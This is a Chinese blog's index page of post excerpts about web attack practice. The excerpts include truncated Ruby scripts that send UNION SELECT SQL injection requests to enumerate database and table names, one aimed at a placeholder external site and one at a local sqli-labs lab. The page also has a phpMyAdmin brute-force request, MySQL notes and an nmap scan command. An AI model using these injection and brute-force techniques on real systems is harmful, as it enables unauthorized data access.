2020年4月11日
burp 猜表操作
摘要: 阅读全文
posted @ 2020-04-11 15:35 cat2020 阅读(145) 评论(0) 推荐(0)
猜数据库某个库的所有表
摘要: require 'http' f = open'a.txt','a' [*0..100].each do |num| url = "http://www.xxx.com.tw/about.php?id=-1%20union%20select%201,2,3,4,5,6,table_name,8,9% 阅读全文
posted @ 2020-04-11 15:02 cat2020 阅读(125) 评论(0) 推荐(0)
2020年4月9日
猜数据库脚本
摘要: require 'http' f = open'q.txt','a' # 猜数据库库名 dbname = [] [*1..50].each do |number| [*'a'..'z'].each do |str| url = "http://127.0.0.1/sqli-labs-master/L 阅读全文
posted @ 2020-04-09 10:58 cat2020 阅读(105) 评论(0) 推荐(0)
2020年3月27日
MySQL学习记录1
摘要: C:\Users\Administrator>mysql -u root -proot #進入MySQL ,另外 -p 回車再輸入密碼,就會隱藏密碼 mysql> #查庫 mysql> show databases; + + | Database | + + | information_schema 阅读全文
posted @ 2020-03-27 17:32 cat2020 阅读(139) 评论(0) 推荐(0)
MySQL学习记录
摘要: 库 Information_schema 库中的表 mysql> show tables; + + | Tables_in_information_schema | + + | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APP 阅读全文
posted @ 2020-03-27 17:16 cat2020 阅读(112) 评论(0) 推荐(0)
2020年3月20日
phpmyadmin爆破腳本
摘要: 拦截的包1 POST /phpMyAdmin/index.php HTTP/1.1 2 Content-Type: application/x-www-form-urlencoded 3 Connection: close 4 Host: xxx 5 User-Agent: http.rb/4.3. 阅读全文
posted @ 2020-03-20 14:14 cat2020 阅读(1607) 评论(0) 推荐(0)
2020年3月17日
nmap查端口
摘要: nmap -Pn -sS ID 阅读全文
posted @ 2020-03-17 19:54 cat2020 阅读(162) 评论(0) 推荐(0)